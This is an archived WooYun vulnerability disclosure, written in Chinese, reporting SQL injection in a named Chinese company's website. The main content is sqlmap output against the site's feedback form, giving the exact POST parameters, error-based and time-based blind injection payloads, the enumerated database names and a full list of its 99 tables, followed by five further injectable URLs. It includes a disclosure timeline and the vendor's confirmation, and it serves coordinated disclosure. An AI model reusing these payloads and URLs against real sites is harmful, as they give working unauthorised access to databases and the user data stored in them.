乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-07: 细节已通知厂商并且等待厂商处理中 2015-04-07: 厂商已经确认,细节仅向厂商公开 2015-04-17: 细节向核心白帽子及相关领域专家公开 2015-04-27: 细节向普通白帽子公开 2015-05-07: 细节向实习白帽子公开 2015-05-22: 细节向公众公开
rt...
中兴国通通讯装备技术(北京)有限公司POST注入www.zte-gt.com/feedback/post.php--data="act=formsend&address=e&content=&email=e&groupid=&ImgCode=e&name=e&products_num=e&tel=e&title=e"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: groupid Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=formsend&address=e&content=&email=e&groupid=' AND (SELECT 1640FROM(SELECT COUNT(*),CONCAT(0x7164796371,(SELECT (CASE WHEN (1640=1640) THEN 1 ELSE 0 END)),0x716c647a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iabH'='iabH&ImgCode=e&name=e&products_num=e&tel=e&title=e Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=formsend&address=e&content=&email=e&groupid=' AND SLEEP(5) AND'VHle'='VHle&ImgCode=e&name=e&products_num=e&tel=e&title=e---[10:07:37] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[10:07:37] [INFO] fetching database names[10:07:38] [WARNING] reflective value(s) found and filtering out[10:07:38] [INFO] the SQL query used returns 2 entries[10:07:40] [INFO] retrieved: information_schema[10:07:42] [INFO] retrieved: ztegtavailable databases [2]:[*] information_schema[*] ztegt[99 tables]+--------------------------+| pwn_advs_duilian || pwn_advs_lb || pwn_advs_lbgroup || pwn_advs_link || pwn_advs_linkgroup || pwn_advs_logo || pwn_advs_movi || pwn_advs_pic || pwn_advs_pop || pwn_advs_text || pwn_base_admin || pwn_base_adminauth || pwn_base_adminmenu || pwn_base_adminrights || pwn_base_border || pwn_base_coltype || pwn_base_config || pwn_base_pageset || pwn_base_pagetemp || pwn_base_plus || pwn_base_plusdefault || pwn_base_plusplan || pwn_base_plusplanid || pwn_base_plustemp || pwn_base_version || pwn_comment || pwn_comment_cat || pwn_comment_config || pwn_down_cat || pwn_down_con || pwn_down_config || pwn_down_downlog || pwn_down_pages || pwn_down_pcat || pwn_down_proj || pwn_down_prop || pwn_feedback || pwn_feedback_group || pwn_feedback_info || pwn_job || pwn_job_form || pwn_job_telent || pwn_member || pwn_member_buylist || pwn_member_cat || pwn_member_centlog || pwn_member_centrule || pwn_member_centset || pwn_member_config || pwn_member_defaultrights || pwn_member_fav || pwn_member_friends || pwn_member_group || pwn_member_msn || pwn_member_notice || pwn_member_nums || pwn_member_pay || pwn_member_paycenter || pwn_member_regstep || pwn_member_rights || pwn_member_secure || pwn_member_type || pwn_member_zone || pwn_menu || pwn_menu_group || pwn_news_cat || pwn_news_con || pwn_news_config || pwn_news_downlog || pwn_news_pages || pwn_news_pcat || pwn_news_proj || pwn_news_prop || pwn_page || pwn_page_group || pwn_photo_cat || pwn_photo_con || pwn_photo_config || pwn_photo_pages || pwn_photo_pcat || pwn_photo_proj || pwn_photo_prop || pwn_product_cat || pwn_product_con || pwn_product_config || pwn_product_pages || pwn_product_pcat || pwn_product_proj || pwn_product_prop || pwn_tools_code || pwn_tools_photopolldata || pwn_tools_photopollindex || pwn_tools_pollconfig || pwn_tools_polldata || pwn_tools_pollindex || pwn_tools_statbase || pwn_tools_statcome || pwn_tools_statcount || pwn_tools_statdate |+--------------------------+
剩下五处注入点:
www.zte-gt.com/search/index.php?imageField=&key=%5cwww.zte-gt.com/news/index.php?catid=0&imageField=&key=%5c www.zte-gt.com/news/class/index.php?author=&catid=78&key=%5c&myord=dtime&myshownums=&page=1&showdate=&showtj=www.zte-gt.com/product/index.php?author=&catid=0&key=%5c&myord=uptime&myshownums=&page=1&showtj=
危害等级:高
漏洞Rank:11
确认时间:2015-04-07 14:13
感谢~
暂无